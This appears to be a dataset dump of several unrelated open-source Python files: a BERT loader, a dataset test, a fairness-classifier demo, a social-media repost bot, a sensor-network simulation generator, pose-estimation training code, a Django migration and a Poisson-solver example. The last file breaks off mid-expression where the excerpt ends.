'cL': 'cased_L-24_H-1024_A-16',
'mcS': 'multi_cased_L-12_H-768_A-12'}
bert_type = map_bert_type_abb[params.bert_type_abb]
if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS':
do_lower_case = False
else:
do_lower_case = True
no_pretraining = False
bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json')
vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt')
init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin')
print('bert_config_file', bert_config_file)
print('vocab_file', vocab_file)
print('init_checkpoint', init_checkpoint)
bert_config = BertConfig.from_json_file(bert_config_file)
tokenizer = tokenization.FullTokenizer(
vocab_file=vocab_file, do_lower_case=do_lower_case)
bert_config.print_status()
model_bert = BertModel(bert_config)
if no_pretraining:
pass
else:
model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu'))
print("Load pre-trained parameters.")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model_bert.to(device)
return model_bert, tokenizer, bert_config
# overwrite the original function with the modified version
utils_bert.get_bert = get_bert
| 2.375 | 2 |
tests/r/test_rep_vict.py | hajime9652/observations | 199 | 12797520 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.rep_vict import rep_vict
def test_rep_vict():
"""Test module rep_vict.py by downloading
rep_vict.csv and testing shape of
extracted data has 8 rows and 8 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = rep_vict(test_path)
try:
assert x_train.shape == (8, 8)
except:
shutil.rmtree(test_path)
    raise
| 2.421875 | 2 |
fairness/algorithms/zafar/fair-classification-master/disparate_impact/synthetic_data_demo/fairness_acc_tradeoff.py | yashwarlord/fairness-comparison | 146 | 12797521 |
import os,sys
import numpy as np
from generate_synthetic_data import *
sys.path.insert(0, '../../fair_classification/') # the code for fair classification is in this directory
import utils as ut
import loss_funcs as lf # loss funcs that can be optimized subject to various constraints
NUM_FOLDS = 10 # we will show 10-fold cross validation accuracy as a performance measure
def test_synthetic_data():
""" Generate the synthetic data """
X, y, x_control = generate_synthetic_data(plot_data=False)
ut.compute_p_rule(x_control["s1"], y) # compute the p-rule in the original data
""" Classify the data without any constraints """
apply_fairness_constraints = 0
apply_accuracy_constraint = 0
sep_constraint = 0
loss_function = lf._logistic_loss
X = ut.add_intercept(X) # add intercept to X before applying the linear classifier
test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{} for i in range(0,NUM_FOLDS)])
print
print "== Unconstrained (original) classifier =="
ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, "s1")
""" Now classify such that we achieve perfect fairness """
apply_fairness_constraints = 1
cov_factor = 0
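    # cov_factor == 0 caps the covariance between the sensitive attribute and the
    # signed distance to the decision boundary at zero, i.e. it asks the solver
    # for (approximately) perfect fairness under this formulation.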
test_acc_arr, train_acc_arr, correlation_dict_test_arr, correlation_dict_train_arr, cov_dict_test_arr, cov_dict_train_arr = ut.compute_cross_validation_error(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'], [{'s1':cov_factor} for i in range(0,NUM_FOLDS)])
print
print "== Constrained (fair) classifier =="
ut.print_classifier_fairness_stats(test_acc_arr, correlation_dict_test_arr, cov_dict_test_arr, "s1")
""" Now plot a tradeoff between the fairness and accuracy """
ut.plot_cov_thresh_vs_acc_pos_ratio(X, y, x_control, NUM_FOLDS, loss_function, apply_fairness_constraints, apply_accuracy_constraint, sep_constraint, ['s1'])
def main():
test_synthetic_data()
if __name__ == '__main__':
main() | 2.84375 | 3 |
revivesocialmedia/revivesocialmedia.py | MSAdministrator/revive-social-media | 0 | 12797522 |
from .opensourceprojects import OpenSourceProjects
from .blogposts import BlogPosts
from .posttweet import PostTweet
from .postlinkedin import PostLinkedIn
class ReviveSocialMedia:
_OSS_MESSAGE = 'OSS Project: {name} is {description}. Check it out! {url} #reviveposts'
_BLOG_MESSAGE = 'Blog Post: {name}. Check it out! {url} #reviveposts'
def blog(self):
random_blog = BlogPosts().get()
        # build the message outside the try block so it is still defined for the
        # LinkedIn post below even if the Twitter post fails
        message = self._BLOG_MESSAGE.format(
            name=random_blog['title'],
            url=random_blog['link']
        )
        try:
            PostTweet().post(message)
except:
print("Error posting to Twitter")
pass
try:
PostLinkedIn().post(
message,
random_blog['title'],
random_blog['link']
)
except:
print("Error posting to LinkedIn")
pass
#self.blog()
def oss(self):
random_project = OpenSourceProjects().get()
tweet = self._OSS_MESSAGE.format(name=random_project['name'], description=random_project['description'], url=random_project['url'])
try:
if 'documentation' in random_project:
tweet = tweet + ' Docs: {}'.format(random_project.get('documentation',''))
if 'repository' in random_project:
tweet = tweet + ' Repo: {}'.format(random_project.get('repository',''))
if 'type' in random_project:
tweet = tweet + ' #{}'.format(random_project.get('type',''))
PostTweet().post(tweet)
except:
print("Error posting to Twitter")
pass
try:
PostLinkedIn().post(
tweet,
random_project['name'],
random_project['url']
)
except:
print("Error posting to LinkedIn")
pass
#self.oss()
| 2.578125 | 3 |
test_tools/simgen_ta.py | mpastyl/Arctium | 0 | 12797523 | #!/usr/bin/env python2.7
import sys
import argparse
import traceback
ap = argparse.ArgumentParser(description='Simulation generator')
ap.add_argument('--basepath', required=False, default="../..",
help='Base path')
ap.add_argument('-c', '--config', required=False, default="params.py",
help='Configuration python file')
args = ap.parse_args()
import os
from collections import namedtuple, OrderedDict
from shutil import copy, rmtree
import traceback
import subprocess
import itertools
import re
import random
basepath = args.basepath
#apppath = os.path.join(basepath, "apps", "glossy-test")
#apppath = os.path.join(basepath, "apps", "ta")
apppath = os.path.join(basepath, "apps", "crystal")
sys.path += [".", os.path.join(basepath,"test_tools")]
params = args.config
def rnd_unique(nodes, n):
l = 0
r = []
while (l<n):
x = random.choice(nodes)
if x not in r:
r.append(x)
l += 1
return r
def generate_table_array(nodes, num_epochs, concurrent_txs):
tbl = []
if seed is not None:
random.seed(seed)
for _ in xrange(num_epochs):
tbl += rnd_unique(nodes, concurrent_txs)
return "static const uint8_t sndtbl[] = {%s};"%",".join([str(x) for x in tbl])
binary_name = "crystal.sky"
def prepare_binary(simdir, nodes, num_epochs, concurrent_txs, new_env):
env = os.environ.copy()
env.update(new_env)
abs_bname = os.path.join(apppath, binary_name)
abs_ihex_name = abs_bname + ".ihex"
abs_tbl_name = os.path.join(apppath, "sndtbl.c")
abs_env_name = abs_bname + ".env"
with open(abs_tbl_name, "w") as f:
f.write(generate_table_array(nodes, num_epochs, concurrent_txs))
pwd = os.getcwd()
os.chdir(apppath)
subprocess.check_call(["sh","-c","./build_simgen.sh"], env=env)
os.chdir(pwd)
try:
os.makedirs(simdir)
except OSError,e:
print e
nodelist = os.path.join(simdir, "nodelist.txt")
with open(nodelist, "w") as f:
for n in nodes:
f.write("%d\n"%n)
copy(abs_bname, simdir)
copy(abs_ihex_name, simdir)
copy(abs_env_name, simdir)
copy(abs_tbl_name, simdir)
def mk_env(power, channel, sink, num_senders, longskip, n_empty, cca):
cflags = [
"-DTX_POWER=%d"%power,
"-DRF_CHANNEL=%d"%channel,
"-DCRYSTAL_SINK_ID=%d"%sink,
"-DSTART_EPOCH=%d"%start_epoch,
"-DCONCURRENT_TXS=%d"%num_senders,
"-DNUM_ACTIVE_EPOCHS=%d"%active_epochs,
"-DCRYSTAL_CONF_PERIOD=%f"%period,
"-DN_TX_S=%d"%n_tx_s,
"-DN_TX_T=%d"%n_tx_t,
"-DN_TX_A=%d"%n_tx_a,
"-DDUR_S_MS=%d"%dur_s,
"-DDUR_T_MS=%d"%dur_t,
"-DDUR_A_MS=%d"%dur_a,
"-DCRYSTAL_SYNC_ACKS=%d"%sync_ack,
"-DCRYSTAL_LONGSKIP=%d"%longskip,
"-DCRYSTAL_PAYLOAD_LENGTH=%d"%payload,
"-DCRYSTAL_SINK_MAX_EMPTY_TS=%d"%n_empty.r,
"-DCRYSTAL_MAX_SILENT_TAS=%d"%n_empty.y,
"-DCRYSTAL_MAX_MISSING_ACKS=%d"%n_empty.z,
"-DCRYSTAL_SINK_MAX_NOISY_TS=%d"%n_empty.x,
"-DCRYSTAL_USE_DYNAMIC_NEMPTY=%d"%dyn_nempty,
"-DCCA_THRESHOLD=%d"%cca.dbm,
"-DCCA_COUNTER_THRESHOLD=%d"%cca.counter,
"-DCHHOP_MAPPING=CHMAP_%s"%chmap,
"-DBOOT_CHOPPING=BOOT_%s"%boot_chop,
"-DN_FULL_EPOCHS=%d"%full_epochs,
]
if logging:
cflags += ["-DCRYSTAL_LOGGING=1"]
else:
cflags += ["-DDISABLE_UART=1"]
if testbed in ("indriya", "fbk", "twist"):
cflags += ["-DTINYOS_SERIAL_FRAMES=1"]
if testbed in ("indriya", "fbk", "flock", "twist"):
cflags += ["-DTINYOS_NODE_ID=1"]
if testbed == "indriya":
cflags += ["-DSHORT_LOGS=1"]
if testbed == "cooja":
cflags += ["-DCOOJA=1"]
if testbed in ("indriya", "fbk"):
cflags += ["-DCRYSTAL_START_DELAY_SINK=40", "-DCRYSTAL_START_DELAY_NONSINK=20"]
else:
cflags += ["-DCRYSTAL_START_DELAY_SINK=0", "-DCRYSTAL_START_DELAY_NONSINK=0"]
cflags = " ".join(cflags)
new_env = {"CFLAGS":cflags}
return new_env
glb = {}
pars = {}
execfile(params, glb, pars)
def set_defaults(dst, src):
for k,v in src.items():
if k not in dst:
dst[k] = v
CcaTuple = namedtuple("CcaTuple", "dbm counter")
NemptyTuple = namedtuple("NemptyTuple", "r y z x")
defaults = {
"period":2,
"sync_ack":1,
"dyn_nempty":0,
#"n_emptys":[(2, 2, 4, 0)],
"nodemaps":["all"],
"ccas":[(-32, 100)],
"payload":2,
#"chmap":"nohop",
#"boot_chop":"nohop",
"logging":True,
"seed":None,
}
set_defaults(pars, defaults)
print "using the following params"
print pars
globals().update(pars)
print "--- Preparing simulations ------------------------"
all_nodes = set()
with open("nodelist.txt") as f:
for l in f:
l = l.strip()
if l:
all_nodes.add(int(l.strip()))
simnum = 0
for (power, channel, sink, num_senders, longskip, n_empty, cca, nodemap) in itertools.product(powers, channels, sinks, num_senderss, longskips, n_emptys, ccas, nodemaps):
n_empty = NemptyTuple(*n_empty)
cca = CcaTuple(*cca)
simdir = "sink%03d_snd%02d_p%02d_c%02d_e%.2f_ns%02d_nt%02d_na%02d_ds%02d_dt%02d_da%02d_syna%d_ls%02d_pl%03d_r%02dy%02dz%02dx%02d_dyn%d_cca%d_%d_fe%02d_%s_%s_%s_B%s"%(sink, num_senders, power, channel, period, n_tx_s, n_tx_t, n_tx_a, dur_s, dur_t, dur_a, sync_ack, longskip, payload, n_empty.r, n_empty.y, n_empty.z, n_empty.x, dyn_nempty, cca.dbm, cca.counter, full_epochs, testbed, nodemap, chmap, boot_chop)
if os.path.isdir(simdir):
continue
try:
nodemap_txt = nodemap+".txt"
if nodemap != "all" and not os.path.exists(nodemap_txt):
raise Exception("Node map file does not exist: " + nodemap_txt)
nodes = set(all_nodes)
if nodemap != "all":
with open(nodemap_txt) as f:
for l in f:
l = l.strip()
if l:
nodes.remove(int(l.strip().split()[0]))
if sink not in nodes:
raise Exception("Sink node doesn't exist")
all_senders = [x for x in nodes if x!=sink]
new_env = mk_env(power, channel, sink, num_senders, longskip, n_empty, cca)
prepare_binary(simdir, all_senders, active_epochs, num_senders, new_env)
if nodemap != "all":
copy(nodemap_txt, os.path.join(simdir, "nodemap.txt"))
num_nodes = len(all_senders)
with open(os.path.join(simdir, "params_tbl.txt"), "w") as f:
p = OrderedDict()
p["testbed"] = testbed
p["num_nodes"] = num_nodes
p["active_epochs"] = active_epochs
p["start_epoch"] = start_epoch
p["seed"] = seed
p["power"] = power
p["channel"] = channel
p["period"] = period
p["senders"] = num_senders
p["sink"] = sink
p["n_tx_s"] = n_tx_s
p["n_tx_t"] = n_tx_t
p["n_tx_a"] = n_tx_a
p["dur_s"] = dur_s
p["dur_a"] = dur_a
p["dur_t"] = dur_t
p["sync_ack"] = sync_ack
p["longskip"] = longskip
p["n_empty"] = n_empty.r
p["n_empty.y"] = n_empty.y
p["n_empty.z"] = n_empty.z
p["n_empty.x"] = n_empty.x
p["nodemap"] = nodemap
p["cca"] = cca.dbm
p["cca_cnt"] = cca.counter
p["payload"] = payload
p["chmap"] = chmap
p["boot_chop"] = boot_chop
p["full_epochs"] = full_epochs
header = " ".join(p.keys())
values = " ".join([str(x) for x in p.values()])
f.write(header)
f.write("\n")
f.write(values)
f.write("\n")
simnum += 1
except Exception, e:
traceback.print_exc()
if os.path.isdir(simdir):
rmtree(simdir)
raise e
print "%d simulation(s) generated"%simnum
| 1.929688 | 2 |
lib/core/function.py | AIprogrammer/AdvMix | 11 | 12797524 |
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by <NAME> (<EMAIL>)
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import logging
import os, copy
import numpy as np
import torch
from core.evaluate import accuracy
from core.inference import get_final_preds, get_final_preds_using_softargmax, SoftArgmax2D
from utils.transforms import flip_back, tofloat, coord_norm, inv_coord_norm, _tocopy, _tocuda
from utils.vis import save_debug_images
import torch.nn as nn
from tqdm import tqdm
import torch.nn.functional as F
logger = logging.getLogger(__name__)
def train(config, args, train_loader, model, criterion, optimizer, epoch,
output_dir, tb_log_dir, writer_dict):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
acc = AverageMeter()
if isinstance(model, list):
model = model[0].train()
model_D = model[1].train()
else:
model.train()
end = time.time()
for i, (input, target, target_weight, meta) in tqdm(enumerate(train_loader)):
data_time.update(time.time() - end)
outputs = model(input)
target = target[0].cuda(non_blocking=True)
target_hm = target
target_weight = target_weight.cuda(non_blocking=True)
loss = criterion(outputs, target, target_weight)
# compute gradient and do update step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# measure accuracy and record loss
losses.update(loss.item(), input.size(0))
_, avg_acc, cnt, pred = accuracy(outputs,
target, args=None, cfg=config)
outputs = _tocuda(outputs)
acc.update(avg_acc, cnt)
batch_time.update(time.time() - end)
end = time.time()
if i % config.PRINT_FREQ == 0:
msg = 'Epoch: [{0}][{1}/{2}]\t' \
'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\t' \
'Speed {speed:.1f} samples/s\t' \
'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\t' \
'Loss {loss.val:.5f} ({loss.avg:.5f})\t' \
'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
speed=input.size(0)/batch_time.val,
data_time=data_time, loss=losses, acc=acc)
logger.info(msg)
writer = writer_dict['writer']
global_steps = writer_dict['train_global_steps']
writer.add_scalar('train_loss', losses.val, global_steps)
writer.add_scalar('train_acc', acc.val, global_steps)
writer_dict['train_global_steps'] = global_steps + 1
prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i)
save_debug_images(config, input, meta, target_hm, pred*4, outputs,
prefix)
def set_require_grad(nets, requires_grad=True):
if not isinstance(nets, list):
nets = [nets]
for net in nets:
if net is not None:
for param in net.parameters():
param.requires_grad = requires_grad
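# Usage sketch mirroring train_advmix below: freeze the task network while the
# augmentation generator takes its step, then unfreeze it (illustrative):
#
#   set_require_grad(model, False)   # generator update, task model frozen
#   set_require_grad(model, True)    # task-model update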
def train_advmix(config, args, train_loader, models, criterion, optimizers, epoch,
output_dir, tb_log_dir, writer_dict):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
acc = AverageMeter()
if isinstance(models, list):
model = models[0].train()
model_G = models[1].train()
model_teacher = models[2].eval()
else:
models.train()
optimizer = optimizers[0]
optimizer_G = optimizers[1]
end = time.time()
for i, (inputs, targets, target_weights, metas) in tqdm(enumerate(train_loader)):
data_time.update(time.time() - end)
# mask_channel = meta['model_supervise_channel'] > 0.5
if isinstance(inputs, list):
inputs = [_.cuda(non_blocking=True) for _ in inputs]
target = targets[0].cuda(non_blocking=True)
target_weight = target_weights[0].cuda(non_blocking=True)
meta = metas[0]
else:
inputs = inputs.cuda(non_blocking=True)
G_input = torch.cat(inputs, dim=1)
mix_weight = F.softmax(model_G(G_input), dim=1)
set_require_grad(model, True)
optimizer.zero_grad()
tmp = inputs[0] * mix_weight[:,0,...].unsqueeze(dim=1)
for list_index in range(1, len(inputs)):
tmp += inputs[list_index] * mix_weight[:,list_index].unsqueeze(dim=1)
D_output_detach = model(tmp.detach())
with torch.no_grad():
teacher_output = model_teacher(inputs[0])
loss_D_hm = criterion(D_output_detach, target, target_weight)
loss_D_kd = criterion(D_output_detach, teacher_output, target_weight)
loss_D = loss_D_hm * (1 - args.alpha) + loss_D_kd * args.alpha
loss_D.backward()
optimizer.step()
# G: compute gradient and do update step
set_require_grad(model, False)
optimizer_G.zero_grad()
outputs = model(tmp)
output = outputs
loss_G = -criterion(output, target, target_weight) * args.adv_loss_weight
loss_G.backward()
optimizer_G.step()
# measure accuracy and record loss
losses.update(loss_D.item(), inputs[0].size(0))
_, avg_acc, cnt, pred = accuracy(output,
target, args=None, cfg=config)
acc.update(avg_acc, cnt)
batch_time.update(time.time() - end)
end = time.time()
if i % config.PRINT_FREQ == 0:
msg = 'Epoch: [{0}][{1}/{2}]\t' \
'Time {batch_time.val:.3f}s ({batch_time.avg:.3f}s)\t' \
'Speed {speed:.1f} samples/s\t' \
'Data {data_time.val:.3f}s ({data_time.avg:.3f}s)\t' \
'Loss {loss.val:.5f} ({loss.avg:.5f})\t' \
'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(
epoch, i, len(train_loader), batch_time=batch_time,
speed=inputs[0].size(0)/batch_time.val,
data_time=data_time, loss=losses, acc=acc)
logger.info(msg)
writer = writer_dict['writer']
global_steps = writer_dict['train_global_steps']
writer.add_scalar('train_loss', losses.val, global_steps)
writer.add_scalar('train_acc', acc.val, global_steps)
writer_dict['train_global_steps'] = global_steps + 1
prefix = '{}_{}'.format(os.path.join(output_dir, 'train'), i)
save_debug_images(config, inputs[0], copy.deepcopy(meta), target, pred*4, outputs,
prefix + '_clean')
save_debug_images(config, tmp, copy.deepcopy(meta), target, pred*4, outputs,
prefix)
def validate(config, args, val_loader, val_dataset, model, criterion, output_dir,
tb_log_dir, writer_dict=None, cpu=False):
batch_time = AverageMeter()
losses = AverageMeter()
acc = AverageMeter()
# switch to evaluate mode
model.eval()
num_samples = len(val_dataset)
all_preds = np.zeros(
(num_samples, config.MODEL.NUM_JOINTS, 3),
dtype=np.float32
)
all_boxes = np.zeros((num_samples, 6))
image_path = []
filenames = []
imgnums = []
idx = 0
feat_dict = {}
with torch.no_grad():
end = time.time()
time_gpu = 0.
for i, (input, target, target_weight, meta) in tqdm(enumerate(val_loader)):
if not cpu:
input = input.cuda()
# compute output
torch.cuda.synchronize()
infer_start = time.time()
outputs = model(input)
infer_end = time.time()
torch.cuda.synchronize()
time_gpu += (infer_end - infer_start)
if isinstance(outputs, list):
output = outputs[-1]
else:
output = outputs
if config.TEST.FLIP_TEST:
input_flipped = input.flip(3)
outputs_flipped = model(input_flipped)
if isinstance(outputs_flipped, list):
output_flipped = outputs_flipped[-1]
else:
output_flipped = outputs_flipped
output_flipped = flip_back(output_flipped.cpu().numpy(),
val_dataset.flip_pairs)
if not cpu:
output_flipped = torch.from_numpy(output_flipped.copy()).cuda()
else:
output_flipped = torch.from_numpy(output_flipped.copy())
# feature is not aligned, shift flipped heatmap for higher accuracy
if config.TEST.SHIFT_HEATMAP:
output_flipped[:, :, :, 1:] = \
output_flipped.clone()[:, :, :, 0:-1]
output = (output + output_flipped) * 0.5
            # keep target handling consistent on CPU and GPU so that target_hm is
            # always defined for the debug-image dump below
            target = target[0]
            if not cpu:
                target = target.cuda(non_blocking=True)
                target_weight = target_weight.cuda(non_blocking=True)
            target_hm = target
            loss = criterion(output, target, target_weight)
num_images = input.size(0)
# measure accuracy and record loss
losses.update(loss.item(), num_images)
_, avg_acc, cnt, pred = accuracy(output,
target, args=None, cfg=config)
output = _tocuda(output)
acc.update(avg_acc, cnt)
batch_time.update(time.time() - end)
end = time.time()
# corresponding center scale joint
c = meta['center'].numpy()
s = meta['scale'].numpy()
score = meta['score'].numpy()
preds, maxvals = get_final_preds(
config, args, output.clone().cpu().numpy(), c, s)
all_preds[idx:idx + num_images, :, 0:2] = preds[:, :, 0:2]
all_preds[idx:idx + num_images, :, 2:3] = maxvals
# double check this all_boxes parts
all_boxes[idx:idx + num_images, 0:2] = c[:, 0:2]
all_boxes[idx:idx + num_images, 2:4] = s[:, 0:2]
all_boxes[idx:idx + num_images, 4] = np.prod(s*200, 1)
all_boxes[idx:idx + num_images, 5] = score
image_path.extend(meta['image'])
idx += num_images
if i % config.PRINT_FREQ == 0:
msg = 'Test: [{0}/{1}]\t' \
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t' \
'Loss {loss.val:.4f} ({loss.avg:.4f})\t' \
'Accuracy {acc.val:.3f} ({acc.avg:.3f})'.format(
i, len(val_loader), batch_time=batch_time,
loss=losses, acc=acc)
logger.info(msg)
prefix = '{}_{}'.format(
os.path.join(output_dir, 'val'), i
)
save_debug_images(config, input, meta, target_hm, pred * 4, output,
prefix)
print('=> The average inference time is :', time_gpu / len(val_loader))
name_values, perf_indicator = val_dataset.evaluate(
config, all_preds, output_dir, all_boxes, image_path,
filenames, imgnums
)
model_name = config.MODEL.NAME
if isinstance(name_values, list):
for name_value in name_values:
_print_name_value(name_value, model_name)
else:
_print_name_value(name_values, model_name)
if writer_dict:
writer = writer_dict['writer']
global_steps = writer_dict['valid_global_steps']
writer.add_scalar(
'valid_loss',
losses.avg,
global_steps
)
writer.add_scalar(
'valid_acc',
acc.avg,
global_steps
)
if isinstance(name_values, list):
for name_value in name_values:
writer.add_scalars(
'valid',
dict(name_value),
global_steps
)
else:
writer.add_scalars(
'valid',
dict(name_values),
global_steps
)
writer_dict['valid_global_steps'] = global_steps + 1
return name_values, perf_indicator
# markdown format output
def _print_name_value(name_value, full_arch_name):
names = name_value.keys()
values = name_value.values()
num_values = len(name_value)
logger.info(
'| Arch ' +
' '.join(['| {}'.format(name) for name in names]) +
' |'
)
logger.info('|---' * (num_values+1) + '|')
if len(full_arch_name) > 15:
full_arch_name = full_arch_name[:8] + '...'
logger.info(
'| ' + full_arch_name + ' ' +
' '.join(['| {:.3f}'.format(value) for value in values]) +
' |'
)
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count if self.count != 0 else 0
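# Usage sketch for AverageMeter (illustrative numbers):
#
#   meter = AverageMeter()
#   meter.update(0.5, n=32)   # batch loss 0.5 averaged over 32 samples
#   meter.update(0.3, n=32)
#   meter.avg                 # -> 0.4, running average weighted by n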
| 1.742188 | 2 |
web/migrations/0002_account_userlink_userpreferences.py | Migueltorresp/frgl | 1 | 12797525 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('web', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Account',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('nickname', models.CharField(max_length=20, verbose_name='Nickname', blank=True)),
('os', models.CharField(default=b'iOs', max_length=10, verbose_name='Operating System', choices=[(b'Android', b'Android'), (b'iOs', b'iOs')])),
('device', models.CharField(help_text='The modele of your device. Example: Nexus 5, iPhone 4, iPad 2, ...', max_length=150, null=True, verbose_name='Device', blank=True)),
('play_with', models.CharField(blank=True, max_length=30, null=True, verbose_name='Play with', choices=[(b'Thumbs', 'Thumbs'), (b'Fingers', 'All fingers'), (b'Index', 'Index fingers'), (b'Hand', 'One hand'), (b'Other', 'Other')])),
('accept_friend_requests', models.NullBooleanField(verbose_name='Accept friend requests on Facebook')),
('rank', models.PositiveIntegerField(null=True, verbose_name='Rank', blank=True)),
('account_id', models.PositiveIntegerField(help_text='To find your ID, tap the settings icon, then tap "Profile". Your ID is the number you see on top of the window.', null=True, verbose_name='ID', blank=True)),
('owner', models.ForeignKey(related_name='accounts', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='UserLink',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=20, verbose_name='Platform', choices=[(b'facebook', b'Facebook'), (b'twitter', b'Twitter'), (b'reddit', b'Reddit'), (b'schoolidolu', b'School Idol Tomodachi'), (b'line', b'LINE Messenger'), (b'tumblr', b'Tumblr'), (b'twitch', b'Twitch'), (b'steam', b'Steam'), (b'instagram', b'Instagram'), (b'youtube', b'YouTube'), (b'github', b'GitHub')])),
('value', models.CharField(help_text='Write your username only, no URL.', max_length=64, verbose_name='Username/ID', validators=[django.core.validators.RegexValidator(b'^[0-9a-zA-Z-_\\. ]*$', b'Only alphanumeric and - _ characters are allowed.')])),
('relevance', models.PositiveIntegerField(null=True, verbose_name='How often do you tweet/stream/post about Glee?', choices=[(0, 'Never'), (1, 'Sometimes'), (2, 'Often'), (3, 'Every single day')])),
('owner', models.ForeignKey(related_name='links', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='UserPreferences',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('description', models.TextField(help_text='Write whatever you want. You can add formatting and links using Markdown.', null=True, verbose_name='Description', blank=True)),
('location', models.CharField(help_text='The city you live in. It might take up to 24 hours to update your location on the map.', max_length=200, null=True, verbose_name='Location', blank=True)),
('location_changed', models.BooleanField(default=False)),
('latitude', models.FloatField(null=True, blank=True)),
('longitude', models.FloatField(null=True, blank=True)),
('status', models.CharField(max_length=12, null=True, choices=[(b'THANKS', b'Thanks'), (b'SUPPORTER', 'Idol Supporter'), (b'LOVER', 'Idol Lover'), (b'AMBASSADOR', 'Idol Ambassador'), (b'PRODUCER', 'Idol Producer'), (b'DEVOTEE', 'Ultimate Idol Devotee')])),
('donation_link', models.CharField(max_length=200, null=True, blank=True)),
('donation_link_title', models.CharField(max_length=100, null=True, blank=True)),
('favorite_performer', models.ForeignKey(related_name='fans', on_delete=django.db.models.deletion.SET_NULL, to='web.Performer', null=True)),
('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)),
('user', models.OneToOneField(related_name='preferences', to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
]
| 1.828125 | 2 |
tyrannosaurus/sync.py | kenyon/tyrannosaurus | 0 | 12797526 |
"""
Sync tool.
"""
from __future__ import annotations
import logging
from pathlib import Path
from typing import Sequence, Mapping
from tyrannosaurus.context import _Context
logger = logging.getLogger(__package__)
class Sync:
def __init__(self, context: _Context, dry_run: bool):
self.context = context
self.dry_run = dry_run
def sync(self, path: Path) -> Sequence[str]:
context = _Context(path, dry_run=self.dry_run)
self.fix_init()
self.fix_recipe()
return [str(s) for s in context.targets]
def has(self, key: str):
return self.context.has_target(key)
def replace_substrs(self, path: Path, replace: Mapping[str, str]) -> None:
self.context.back_up(path)
new_lines = []
for line in path.read_text(encoding="utf8").splitlines():
for k, v in replace.items():
if line.startswith(k):
new_lines.append(v)
break
else:
new_lines.append(line)
new_lines = "\n".join(new_lines)
if not self.dry_run:
path.write_text(new_lines, encoding="utf8")
logger.debug("Wrote to {}".format(path))
def fix_init(self) -> None:
if self.has("init"):
self.replace_substrs(
self.context.path / self.context.project / "__init__.py",
{
"__status__ = ": '__status__ = "{}"'.format(self.context.source("status")),
"__copyright__ = ": '__copyright__ = "{}"'.format(
self.context.source("copyright")
),
"__date__ = ": '__date__ = "{}"'.format(self.context.source("date")),
},
)
def fix_recipe(self) -> None:
if self.has("recipe"):
self.replace_substrs(
self.context.path_source("recipe"),
{"{% set version = ": '{% set version = "' + str(self.context.version) + '" %}'},
)
__all__ = ["Sync"]
| 2.515625 | 3 |
examples/poisson/simulation.py | AbhilashReddyM/flowX | 0 | 12797527 | """User defined module for simulation."""
import numpy
def get_analytical(grid, asol, user_bc):
"""Compute and set the analytical solution.
Arguments
---------
grid : flowx.Grid object
Grid containing data.
    asol : string
        Name of the variable on the grid.
    user_bc : string
        Boundary-condition type; 'dirichlet' selects the sine solution,
        any other value the cosine solution.
    """
X, Y = numpy.meshgrid(grid.x, grid.y)
if(user_bc == 'dirichlet'):
values = numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y)
else:
values = numpy.cos(2 * numpy.pi * X) * numpy.cos(2 * numpy.pi * Y)
grid.set_values(asol, values.transpose())
def get_rhs(grid, rvar, user_bc):
"""Compute and set the right-hand side of the Poisson system.
Arguments
---------
grid : flowx.Grid object
Grid containing data.
    rvar : string
        Name of the variable on the grid.
    user_bc : string
        Boundary-condition type; 'dirichlet' selects the sine right-hand side,
        any other value the cosine right-hand side.
    """
X, Y = numpy.meshgrid(grid.x, grid.y)
if(user_bc == 'dirichlet'):
values = (-8 * numpy.pi**2 *
numpy.sin(2 * numpy.pi * X) * numpy.sin(2 * numpy.pi * Y))
else:
values = (-8 * numpy.pi**2 *
